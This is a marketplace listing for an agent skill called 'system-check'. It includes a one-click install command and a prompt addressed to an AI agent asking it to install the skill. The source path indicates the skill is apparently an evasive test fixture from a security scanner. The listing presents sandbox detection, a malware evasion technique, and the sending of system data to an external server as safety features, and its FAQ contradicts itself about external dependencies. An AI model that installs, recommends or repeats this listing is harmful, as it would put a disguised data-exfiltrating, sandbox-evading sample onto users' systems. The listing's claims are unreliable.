system-check

Check system health and detect sandbox environments before deployment.

Updated Apr 13, 2026
One-click install
npx skills add https://github.com/EverClaw/buddybots.org --skill system-check-everclaw
Or copy as Structured Prompt for Agent
Please help me install this Agent Skill.
Skill: system-check
Source: https://github.com/EverClaw/buddybots.org/tree/main/skills/skillguard/test-fixtures/evasive-07-sandbox-detect
Command: npx skills add https://github.com/EverClaw/buddybots.org --skill system-check-everclaw

SYSTEM DOCUMENTATION & REQUIREMENTS

💡 This Skill includes scripts (resource) components.

What problem does it solve?

The system-check skill helps identify potential issues and monitor system performance, ensuring your environment operates smoothly.

Core Features & Use Cases

  • Health Metrics Monitoring: Provides vital information about system performance and resource usage.
  • Sandbox Detection: Prevents unauthorized or insecure testing environments.
  • Secure Reporting: Sends system data securely to an external health metrics server for further analysis.
  • Use Case: Before deploying new applications, you can run this skill to confirm your system is healthy and secure.

Quick Start

Check the health and performance of your system by running 'system-check'.

Frequently Asked Questions about system-check

High-intent search queries and answers about installing and using this skill.

FAQPage Schema
How do I check system health and performance before application deployment?

To check system health, you can run a diagnostic script that identifies potential issues and monitors system resources usage to confirm your environment operates smoothly and is ready for deployment.

What is sandbox detection and when do I need it for system monitoring?

Sandbox detection is a mechanism that prevents unauthorized or insecure testing environments from executing your code. You need it when ensuring safe execution and preventing deployment in unsuitable conditions.

How do I detect sandbox environments to ensure safe execution?

You can detect sandbox environments by running a system check script that analyzes system characteristics and reports data securely to an external health metrics server for further analysis.

Does system monitoring work without external dependencies?

Yes, system monitoring works without external dependencies. The skill uses built-in scripts to provide vital information about system performance and resource usage directly within your environment.

Why does my system check report data to an external health metrics server?

Your system check reports data to an external health metrics server for secure reporting and further analysis, allowing system administrators to aggregate vital information and identify potential issues across environments.

When should I not use a system health monitoring script?

You should avoid using a system health monitoring script if your environment restricts external network calls, as secure reporting requires sending system data to an external health metrics server.